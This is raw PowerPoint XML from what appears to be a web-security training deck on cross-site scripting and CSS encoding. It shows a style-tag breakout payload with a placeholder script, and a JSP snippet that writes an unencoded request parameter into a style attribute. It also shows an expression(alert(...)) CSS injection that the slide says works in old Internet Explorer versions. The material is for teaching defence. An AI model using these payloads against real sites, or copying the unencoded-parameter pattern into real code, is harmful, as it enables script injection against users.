              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>169</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>170</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>171</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>172</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>173</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>174</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>175</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>176</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>177</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>178</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300576" y="2119830"/>
            <a:ext cx="7386224" cy="2478655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>body {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  font-size: 0.8em;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  color: black;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  font-family: Geneva, Verdana, Arial, Helvetica, san-serif;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  background-color: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>brown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  margin: 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  padding: 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4068573" y="3756280"/>
            <a:ext cx="2269463" cy="1278767"/>
            <a:chOff x="4092091" y="3900883"/>
            <a:chExt cx="2269463" cy="1278767"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4123683" y="4594874"/>
              <a:ext cx="2237871" cy="584776"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>URL parameter written within style tag</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Straight Connector 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4092091" y="3900883"/>
              <a:ext cx="0" cy="1260460"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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569275" y="5098544"/>
            <a:ext cx="7632190" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sample Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>purple;}&lt;/style&gt;&lt;script&gt;ATTACK&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> &lt;style&gt;body {color: red</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1936005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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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98" y="457200"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSS Encoding Problems </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Legacy Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1866624"/>
            <a:ext cx="8229600" cy="2708433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>tempWidth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("width");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div style="width: &lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>tempWidth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>%&gt;;"&gt; Mouse over &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeForCSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>expression(alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(88,88,88)))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div style="width: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>expression\28 alert\28 String\2e </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\20 \28 88\2c 88\2c 88\29 \29 \29 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;"&gt; Mouse over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4992354"/>
            <a:ext cx="8229600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pops in IE6, IE7 and quirks mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lists.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pipermail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>owasp-esapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/2009-February/000405.html </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7221666" y="457200"/>
            <a:ext cx="1465134" cy="1484240"/>
            <a:chOff x="6835420" y="616218"/>
            <a:chExt cx="1465134" cy="1484240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Oval 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
